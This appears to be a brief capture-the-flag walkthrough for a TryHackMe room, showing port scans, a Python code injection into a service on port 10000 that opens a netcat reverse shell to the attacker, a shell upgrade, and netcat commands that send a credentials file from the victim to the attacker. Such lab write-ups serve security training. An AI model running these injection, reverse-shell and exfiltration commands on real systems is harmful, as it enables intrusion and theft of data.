# Develpy

**Room Link:** <https://tryhackme.com/room/bsidesgtdevelpy>

### Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FpjK8ZdvgSofTy7SjuaH9%2Fimage.png?alt=media&#x26;token=a8bbccdc-d5e0-4d3f-8154-505794c68b21" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FKsPsfshgqsNHQK4naklq%2Fimage.png?alt=media&#x26;token=3a6d758c-2602-4798-907a-3fa853c1139e" alt=""><figcaption></figcaption></figure>

### Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FnyHR1Mz4Kk3jLgXv5BUz%2Fimage.png?alt=media&#x26;token=6d67b708-6702-4691-97e8-32fa3a25da1f" alt=""><figcaption></figcaption></figure>

### TCP/10000 - Python script

**Kali #1**

```
nc -lvnp 1337
```

**Kali #2**

```
nc $VICTIM 10000
__import__('os').system('nc -e /bin/bash $KALI 1337')
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FACYmuh7ncxDYQpZHLkRY%2Fimage.png?alt=media&#x26;token=a106d596-d0bc-43be-940f-fac07f76fe5a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Frv25VQK1EeDD8EQf8j7G%2Fimage.png?alt=media&#x26;token=8deb983a-2239-4e0b-a61e-c5ed0aec6277" alt=""><figcaption></figcaption></figure>

Get autocomplete

```
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
```

## Netcat

**Kali(receiving)**

```
nc -l -p 1234 > credentials.png
```

**Victim(sending)**

```
nc -w 3 $KALI 1234 < credentials.png
```
